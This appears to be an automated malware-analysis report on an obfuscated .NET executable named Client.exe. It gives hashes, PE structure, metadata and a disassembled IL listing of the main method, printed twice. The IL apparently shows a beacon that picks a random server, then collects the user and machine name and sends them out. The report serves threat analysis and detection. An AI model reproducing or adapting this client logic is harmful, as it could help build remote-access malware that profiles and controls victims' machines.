Suspicious
Suspect

e92574146a3df89600384ca210d9ee1a

PE Executable
|
MD5: e92574146a3df89600384ca210d9ee1a
|
Size: 785.92 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
 Hash Value
MD5
e92574146a3df89600384ca210d9ee1a
Sha1
b323b5309052da1dca8245a09696a13cce346abb
Sha256
0cad204b7b1977deedab017724f427459c001618f6566015ccde93a52dd8f470
Sha384
cbfb7dba22771f5ca1ddb90e9ac07edce98755e9c0fe64b6a882e919ff35ecd44f89617c56a9ffb54fb9e30af5eef465
Sha512
a1b6d456b3ae306cd2c904c2ba2fc76e40c73a6cc2ed0f9bd55068d027a25f6a021d03cb459a96f7822c498cb291063da83cd9b6e82fa9d179aa059be680338b
SSDeep
12288:lcLJxlxlu07dhkUrlptO/sP2en4TkbbOd+8yZpX5bvmKQd3nhRrBbnzPUV11y:qvluqXk+XULXT8bB5bvjQdX
TLSH
8CF46C157F98CD00D550293DC5BAB628CB2BA9F2290263437755B6E14E058DFEE3C2EB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
e92574146a3df89600384ca210d9ee1a
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
rzpy0qi6zgghz492eprcqcl1ugy50
hj2htzibusyw55sq47k
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::gdJqdBrQPYoFXllkn(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

681
Main Method

System.Void rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::gdJqdBrQPYoFXllkn(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::tKbCtXFVTzRucxAhmaYoOcYg() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::yFlSPUawNtSU() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nWzbYZHbaRMCyVW() stloc V_3 nop <null> ldloc V_3 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fQmvtvSTDEe() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::QzFWGJYDxnXUFCxWHbGed() br IL_000E: nop call System.Void rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::QzFWGJYDxnXUFCxWHbGed() call System.Void rdqurKgVYxOLZWl.tTHSyyTOJbDOl::tVIbSKlHbQKqiYVuuxqH() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::DbrmrQtBwC call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ScWjUkmCYHqtTWlul() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jHypDwlxfWltOIWjXufpNzScS call System.Void PLjPmXIKtRuSooqpbHyZ.IbGkzpMjVhoBxf::TGkcenhvaYjFQqIQOKxXzTbh() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jHypDwlxfWltOIWjXufpNzScS call System.Boolean zkKQCFiwojTGkSXm.XKXLRSKaMnPEqR::PSrMBTnzMnHrJNuHmOax(System.String) brtrue IL_0080: call System.Void gPqdaXEQIa.mgpNBvXTMUtVyBGqoGAnceXhO::JpjURNyHDMAGNABXum() leave IL_0283: ret call System.Void gPqdaXEQIa.mgpNBvXTMUtVyBGqoGAnceXhO::JpjURNyHDMAGNABXum() call System.Void qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::zIzEeOeDXiJ() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldfld System.Boolean rdqurKgVYxOLZWl.uixXfplrbRnLZ::ymdylMYvuOD brtrue IL_026E: call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::oYiYOpbzwPn call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::xPEiNVmBpmEyYgXnYQQyDph() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::gYXrEfYTuRdLNepdjV() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::tMnXNYeumogmIhb() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::UOGBAKHudAUSFqHKIUS ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::oyuwJNkDHC() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::atbnPiYoQsBJT() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::llfOeVdmcAfoYHfbkP() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::MEALAQEjtKJno() ldelem System.String call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::WYcEodhioRaIbJRJoH() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::zHWkafxZmkbTNqNCiCXvm() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::dQjlspuRjWCBpTzoCZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::QuqQURSMuDYsxDntJQaOilre() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldloc V_1 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::DuyMxNROHjGRMzWdGAomIeV() ldelem System.String ldloc V_2 ldsfld System.Random qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::UOGBAKHudAUSFqHKIUS ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::kpjGnlhKAqXeYpahbXrIVY(System.String,System.String) ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldfld System.Boolean rdqurKgVYxOLZWl.uixXfplrbRnLZ::ymdylMYvuOD brfalse IL_026E: call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx newobj System.Void qScxWpkQgKuWKzPUx.QTXxSpAEEml::.ctor(rdqurKgVYxOLZWl.uixXfplrbRnLZ) stfld qScxWpkQgKuWKzPUx.QTXxSpAEEml rdqurKgVYxOLZWl.uixXfplrbRnLZ::ISCQqMyXHFcgqMJNOrYvjwfc ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx newobj System.Void PLjPmXIKtRuSooqpbHyZ.UtOtAnafklAYIoj::.ctor(rdqurKgVYxOLZWl.uixXfplrbRnLZ) stfld PLjPmXIKtRuSooqpbHyZ.UtOtAnafklAYIoj rdqurKgVYxOLZWl.uixXfplrbRnLZ::jOCvOeTnLFSOeqUH ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::FRLBtCuAxE() newarr System.Object dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ifDlYabnidEpCSptnNmi() call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fFrveFEvCwsV() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ZxHgBPUEoFTHRnxCP() call System.Byte[] qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::hcNiBfLGEJqWezYZ() stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::LhqmXAbJiDIHnKV() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::yeiZezXLGyVlmRJEOCA stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::IiwEWLGitXli() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::ZXMHOdrRSslrC stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fsrXwbBimaGFrhQwhSIlI() call System.String System.Environment::get_UserName() call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nUnOfMEvsQPuIac() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::PGKtAaHtzOsYDLRjqjU() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::tDqkZyXwJbhFwlQmOh stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::VIpzfdpmLFdwczclND() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::heroxkybrPZGUpcOAiLRERHNm stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::batasMTdFfybYRhJHQ() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::yAucAgWybwBOt stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::OWkVhtlwvEifV() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jVNgMlpLpglacRxhfXNxeGD stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::JtzchxmMAkHNeEevqVUCp() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::bXfgkVNQUX stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::qFLhGQXZWzc() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::JPGouolXtefUiLZXNxI stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::OYihZTYBWANUPgRANNKSxG() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::KeOraOdwBkoESIBRNdSBGo stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::uRAqVobOHk() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::hwLpUIkfGfrNiinfo stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::pGNJvBenhprrRazXLIoJqI() call System.String qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::OQgNUaHyoPWWDYajInRzP() stelem.ref <null> call System.Byte[] IaITmVGGNmjUnt.QwggAGOYROpBwssqhZQJEYLk::pXmTUNMEssrkwBKiaNHbn(System.Object[]) callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::hRSEToyMkdxpebzQKj(System.Byte[]) call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx pop <null> leave IL_0283: ret ret <null>
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::gdJqdBrQPYoFXllkn(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

681
Main Method

System.Void rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::gdJqdBrQPYoFXllkn(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::tKbCtXFVTzRucxAhmaYoOcYg() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::yFlSPUawNtSU() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nWzbYZHbaRMCyVW() stloc V_3 nop <null> ldloc V_3 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fQmvtvSTDEe() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::QzFWGJYDxnXUFCxWHbGed() br IL_000E: nop call System.Void rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::QzFWGJYDxnXUFCxWHbGed() call System.Void rdqurKgVYxOLZWl.tTHSyyTOJbDOl::tVIbSKlHbQKqiYVuuxqH() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::DbrmrQtBwC call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ScWjUkmCYHqtTWlul() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jHypDwlxfWltOIWjXufpNzScS call System.Void PLjPmXIKtRuSooqpbHyZ.IbGkzpMjVhoBxf::TGkcenhvaYjFQqIQOKxXzTbh() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jHypDwlxfWltOIWjXufpNzScS call System.Boolean zkKQCFiwojTGkSXm.XKXLRSKaMnPEqR::PSrMBTnzMnHrJNuHmOax(System.String) brtrue IL_0080: call System.Void gPqdaXEQIa.mgpNBvXTMUtVyBGqoGAnceXhO::JpjURNyHDMAGNABXum() leave IL_0283: ret call System.Void gPqdaXEQIa.mgpNBvXTMUtVyBGqoGAnceXhO::JpjURNyHDMAGNABXum() call System.Void qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::zIzEeOeDXiJ() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldfld System.Boolean rdqurKgVYxOLZWl.uixXfplrbRnLZ::ymdylMYvuOD brtrue IL_026E: call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::oYiYOpbzwPn call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::xPEiNVmBpmEyYgXnYQQyDph() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::gYXrEfYTuRdLNepdjV() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::tMnXNYeumogmIhb() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::UOGBAKHudAUSFqHKIUS ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::oyuwJNkDHC() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::atbnPiYoQsBJT() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::llfOeVdmcAfoYHfbkP() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::MEALAQEjtKJno() ldelem System.String call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::WYcEodhioRaIbJRJoH() newarr System.Char dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::zHWkafxZmkbTNqNCiCXvm() call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::dQjlspuRjWCBpTzoCZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::QuqQURSMuDYsxDntJQaOilre() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldloc V_1 call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::DuyMxNROHjGRMzWdGAomIeV() ldelem System.String ldloc V_2 ldsfld System.Random qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::UOGBAKHudAUSFqHKIUS ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::kpjGnlhKAqXeYpahbXrIVY(System.String,System.String) ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldfld System.Boolean rdqurKgVYxOLZWl.uixXfplrbRnLZ::ymdylMYvuOD brfalse IL_026E: call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx newobj System.Void qScxWpkQgKuWKzPUx.QTXxSpAEEml::.ctor(rdqurKgVYxOLZWl.uixXfplrbRnLZ) stfld qScxWpkQgKuWKzPUx.QTXxSpAEEml rdqurKgVYxOLZWl.uixXfplrbRnLZ::ISCQqMyXHFcgqMJNOrYvjwfc ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx newobj System.Void PLjPmXIKtRuSooqpbHyZ.UtOtAnafklAYIoj::.ctor(rdqurKgVYxOLZWl.uixXfplrbRnLZ) stfld PLjPmXIKtRuSooqpbHyZ.UtOtAnafklAYIoj rdqurKgVYxOLZWl.uixXfplrbRnLZ::jOCvOeTnLFSOeqUH ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::FRLBtCuAxE() newarr System.Object dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ifDlYabnidEpCSptnNmi() call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fFrveFEvCwsV() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::ZxHgBPUEoFTHRnxCP() call System.Byte[] qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::hcNiBfLGEJqWezYZ() stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::LhqmXAbJiDIHnKV() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::yeiZezXLGyVlmRJEOCA stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::IiwEWLGitXli() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::ZXMHOdrRSslrC stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::fsrXwbBimaGFrhQwhSIlI() call System.String System.Environment::get_UserName() call System.String rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nUnOfMEvsQPuIac() call System.String gPqdaXEQIa.TGkvTVnfeludhSMDlAnqbzN::XJyPrmGfEZCKtGZg(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::PGKtAaHtzOsYDLRjqjU() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::tDqkZyXwJbhFwlQmOh stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::VIpzfdpmLFdwczclND() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::heroxkybrPZGUpcOAiLRERHNm stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::batasMTdFfybYRhJHQ() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::yAucAgWybwBOt stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::OWkVhtlwvEifV() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::jVNgMlpLpglacRxhfXNxeGD stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::JtzchxmMAkHNeEevqVUCp() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::bXfgkVNQUX stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::qFLhGQXZWzc() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::JPGouolXtefUiLZXNxI stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::OYihZTYBWANUPgRANNKSxG() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::KeOraOdwBkoESIBRNdSBGo stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::uRAqVobOHk() ldsfld System.String rubxNZhvnqopKtnfXDhZoNG.UqYNinokaemQkDjHhHhak::hwLpUIkfGfrNiinfo stelem.ref <null> dup <null> call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::pGNJvBenhprrRazXLIoJqI() call System.String qScxWpkQgKuWKzPUx.EmXapzTxclALCPkYXJVok::OQgNUaHyoPWWDYajInRzP() stelem.ref <null> call System.Byte[] IaITmVGGNmjUnt.QwggAGOYROpBwssqhZQJEYLk::pXmTUNMEssrkwBKiaNHbn(System.Object[]) callvirt System.Void rdqurKgVYxOLZWl.uixXfplrbRnLZ::hRSEToyMkdxpebzQKj(System.Byte[]) call System.Int32 rubxNZhvnqopKtnfXDhZoNG.FbKzjqYbjdSyKWtSSbrlaiK::nQZdCNvmGjZqLnER() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld rdqurKgVYxOLZWl.uixXfplrbRnLZ rubxNZhvnqopKtnfXDhZoNG.QEhYavSjaxdTeRwOlAGEIF::IHiGldmLpolAWWMx pop <null> leave IL_0283: ret ret <null>
e92574146a3df89600384ca210d9ee1a (785.92 KB)
File Structure
e92574146a3df89600384ca210d9ee1a
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
